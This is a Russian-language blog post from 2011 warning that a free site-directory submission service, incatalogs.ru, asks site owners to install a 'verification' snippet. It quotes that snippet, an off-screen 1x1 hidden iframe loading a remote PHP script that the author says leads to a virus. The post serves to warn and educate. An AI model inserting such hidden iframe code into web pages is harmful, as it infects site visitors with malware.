->

суббота, 8 октября 2011 г.

Халява, как источник неприятностей.

Хотел сегодня сделать чего нить хорошее, но получилось как всегда :)).
Началось все с поиска сервисов, предлагающих прогонку сайта по каталогам, естественно на халяву или по какой нибудь акции.
Накопалась некоторая контора incatalogs.ru, которая предлагала прогонку по 16 000 белых каталогов бесплатно, без установки обратных ссылок и т.д.
Для работы в сервисе всего лишь необходимо добавить некоторый код на свой сайт, для подтверждения того, что вы владелец сайта. Код нужно установить таким образом, чтобы он был доступен с любой страницы сайта.
В общем супер, а не сервис. Каждый день бы пользовался!!! Только вот не все так гладко....

Код который предлагается установить на сайт (ссылку категорически НЕ РЕКОМЕНДУЮ открывать):
<div style="position:absolute;left:-29072px;top:0">
<iframe src=http://incatalogs.ru/js/id35062.php scrolling=no border=0 frameborder=0 width=1 height=1></iframe>
</div>
При открытии любой страницы сайта с установленным кодом формируется объект iframe с координатами за пределами рабочего пространства (экрана) размером 1х1 пиксель. В этом окне открывается ссылка на скрипт php. Казалось бы ну и что?
А то, что дальше начинается веселое, скрипт содержит ссылку на вирус, который лезет аж с нескольких ресурсов поочередно. 
Вирус будет рассмотрен чуточку позднее.

Выводы такие: не надо быть мегакулхакером и знать самые свежие и тайные дыры софта, чтобы заразить кучу сайтов. Для этого достаточно создать сайт и использовать нехитрый метод социальной инженерии (предоставление "халявы"). Тогда хозяева сайтов сами, с огромной радостью будут твоими распространителями.